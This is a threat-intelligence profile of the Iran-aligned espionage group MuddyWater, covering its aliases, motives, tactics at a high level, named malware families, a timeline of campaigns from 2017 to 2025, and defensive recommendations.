Introduction
MuddyWater, also known as Earth Vetala, Seedworm, COBALT ULSTER, TA450, Static Kitten, Mango Sandstorm, MERCURY, G0069, Boggy Serpens, ATK51, and TEMP.Zagros, is an advanced persistent threat (APT) group aligned with Iran, active since at least 2015. MuddyWater is heavily connected to Iran’s Ministry of Intelligence and Security (MOIS). MuddyWater conducts strategic, cyberespionage operations against governments, telecom providers, defense contractors, and non-governmental organizations in the Middle East, Europe, and North America.
MuddyWater takes a long-term approach to its operations, focusing on persistence and adaptability in relation to its mission, rather than technical sophistication, and continues to evolve its operations and methodology beyond formal state service.
Identity and Motivation
MuddyWater has been widely attributed to Iranian state-sponsored cyber operations. The primary motivation behind MuddyWater operations is intelligence gathering in support of Tehran’s geopolitical objectives, focusing on monitoring regional stakeholders, projecting influence, and enhancing Iran’s cyber capabilities.
MuddyWater also conducts regional influence operations against organizations in Israel, Saudi Arabia, and Western countries often, by retargeting them or their organizations to exfiltrate or facilitate access to sensitive political, defense, and energy-related information.
Aliases: Earth Vetala, ATK51, Seedworm, COBALT ULSTER, TA450, Static Kitten, Mango Sandstorm, MERCURY, G0069, Boggy Serpens, TEMP.Zagros.
TTPs (Tactics, Techniques and Procedures)
MuddyWater employs persistent but low-sophistication capabilities. It is known for using legitimate tools, open-source frameworks, and custom PowerShell malware to maintain permanent access.
Techniques: Credential theft, lateral movement through the use of stolen administrator accounts, use of living-off-the-land binaries (LOLBins), and data exfiltration through encrypted channels.
Initial Access: Phishing and spear-phishing messages containing malware-laced documents; exploitation of internet-facing applications with unpatched vulnerabilities.
Persistence: Modifications to the registry, malicious scheduled tasks, use of legitimate tools for administrative purposes, and compromised credentials of administrators.
Command and Control (C2): Use of open-source frameworks, custom scripts, and publicly available malware to maintain stealthy communication channels with the victim’s environment.
Malware and Tools: POWERSTATS, PowGoop, Small Sieve, MuddyC3, and malicious PowerShell/VBS scripts.
Notable Operations
2017–2018: Conducted mass phishing campaigns against government and telecommunications organizations in the Middle East.
2019: Extended their operational reach to Europe, targeting the academic and NGO sectors.
2020: Used open-source frameworks along with custom PowerShell malware in espionage campaigns.
2021: U.S. Cyber Command issued public warnings pointing to MuddyWater’s use of open-source tools to conduct credential theft.
2022: Focus was increased toward the defense and energy sectors of Israel and Saudi Arabia.
2023: Expanded target scope to include North American research institutions and European government agencies.
2024–2025: Phishing and credential theft operations continued and expanded across Europe, North America, and the Middle East while using a mixture of open-source and custom malware.
Recent Developments
As of 2025, MuddyWater is still an operational Iranian cyber espionage threat actor. It has publicly evolving its tactics, for example, by combining publicly available tools with its own custom malware, making attribution more difficult to hone in on, while ultimately complicating detection. While MuddyWater’s operational tradecraft is generally considered low-level, the persistence, adaptability, and the extent to which MuddyWater aligns with the Iranian state’s objectives ensure it remains relevant in the global threat landscape. The group is increasingly targeting sectors associated with critical infrastructure and energy security, which further aligns to Iran’s interest in monitoring and impacting adversaries’ energy security and regional policy engagement.
Conclusion
MuddyWater is a high-risk state-sponsored cyber espionage threat actor. It does not possess the level of technical sophistication as its peers, however its consistency, level of adaptability, and geopolitical alignment make it a compelling cyber threat across multiple jurisdictions.
Defensive Takeaways
- Train staff to identify phishing and spear-phishing emails.
- Deploy timely patches to public-facing software applications.
- Look for anomalous usage of PowerShell and scheduled tasks.
- Detect anomalous credential usage and lateral movement.
- Leverage threat intelligence capabilities to detect indicators of compromise associated with MuddyWater campaigns.
As Tehran’s use of cyber operations continues to project power and manage strategic intelligence, MuddyWater will no doubt be a key component of Iran’s offensive cyber ecosystem through 2025 and beyond.
You can download and review the sheet for all the details!
